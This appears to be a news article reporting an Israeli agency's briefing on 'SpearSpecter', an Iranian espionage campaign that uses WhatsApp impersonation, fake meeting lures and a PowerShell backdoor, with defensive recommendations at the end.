The National Digital Agency has uncovered a sophisticated and unprecedented Iranian cyber espionage campaign, codenamed “SpearSpecter,” attributed to a known Iranian threat group linked to the Islamic Revolutionary Guard Corps’ intelligence organization (IRGC-IO).
The group—also operating under names such as APT42 and CharmingCypress—has shifted tactics, moving away from broad, indiscriminate cyberattacks to highly targeted espionage based on advanced social engineering.
2 View gallery
Members of Iran’s Islamic Revolutionary Guard Corps (IRGC) operate at computer stations in an undated image
(Photo: Screengrab)
In a briefing with cyber researcher Shimi Cohen and Nir Bar Yosef, head of the agency’s cyber unit, officials revealed that the campaign systematically targets high-value individuals in Israel’s defense and government sectors, as well as their family members.
“This campaign marks a significant evolution,” said Bar Yosef. “Cyberattacks are becoming more personal and resource-intensive. It’s not just about stealing passwords anymore—it’s about gaining long-term, persistent access to specific targets.”
The attackers invest days or even weeks building what appear to be legitimate personal or professional connections with their targets. Common lures include invitations to “prestigious conferences” or scheduling “high-level meetings.”
One of their primary tools is WhatsApp, which is used to initiate contact. The messaging platform offers a familiar, trusted interface that helps build rapport. “The campaign starts with preliminary intelligence gathering,” Cohen explained. “Then the attackers impersonate a legitimate figure and reach out to the target, usually via WhatsApp.”
Once trust is established, a malicious link is sent, triggering a complex attack chain. For lower-value targets, attackers use pre-designed fake meeting pages that capture login credentials in real time. For higher-value individuals, the goal is to implant a sophisticated backdoor dubbed “TAMECAT” by Google. The malware leverages PowerShell—a Microsoft framework for developers on Windows and Linux—making it harder for conventional security tools to detect.
2 View gallery
Iranian Supreme Leader Ayatollah Ali Khamenei
(Photo: KHAMENEI.IR / AFP, West Asia News Agency)/Handout via REUTERS)
The attackers also exploit built-in Windows features and the WebDAV protocol (used for browser-based cloud document editing) for payload staging. To evade detection, they operate a multi-channel command-and-control (C2) infrastructure that uses legitimate platforms like Telegram and Discord. By routing sensitive data through these apps, the traffic blends in as normal usage.
“The innovation here lies in masking the data flow,” said Cohen. “They use legitimate services like Telegram and Discord as control servers. This makes it extremely difficult for traditional security systems to detect the exfiltration of data.” Bar Yosef added, “In this threat landscape, the number one rule is: verify, verify and verify again.”
National Digital Agency recommendations:
- Double verification: If you receive a WhatsApp message or email asking you to click a link, verify by phone using an official, known number.
- Enable multi-factor authentication (MFA) on all sensitive accounts.
- Reduce exposure: Limit the public sharing of sensitive information—such as past military roles or official titles—on social profiles. Attackers use this data to build convincing impersonation scenarios and for surveillance, as seen in past incidents like Hamas’s social media tracking of IDF soldiers.